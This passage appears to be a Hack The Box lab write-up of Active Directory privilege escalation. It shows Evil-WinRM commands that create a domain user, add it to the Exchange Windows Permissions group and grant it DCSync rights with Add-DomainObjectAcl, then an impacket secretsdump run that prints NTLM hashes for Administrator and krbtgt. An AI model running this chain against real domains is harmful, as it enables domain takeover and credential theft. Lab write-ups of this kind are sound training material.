Priv Escalation

I tried to kerberoast users using RUbeus but I was unable to.

So the user alfresco is part of the Account Operators which have who have genericAll to the windows Exchange permissiosn group who has WriteDacl over DCsync.

This is extremely important because we can add ourselves to the group of WIndows Exchange Permissions and then use a few more commands to get Domain Admin rights.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user lyethar password /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions"  /add lyethar
The command completed successfully.

We first added our user to the Exhange WIndows Permisions group.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass= ConvertTo-SecureString 'password' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\lyethar', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl  -Credential $cred  -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity lyethar -Rights DCSync

With the credentials of the user we added I was able to get DCSync rights over the DC which allowed me to dump all the hashes using the secretsdump utillity from impacket.

 python3 secretsdump.py htb.local/lyethar:password@10.10.10.161     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::

After that we get NT/Authority System.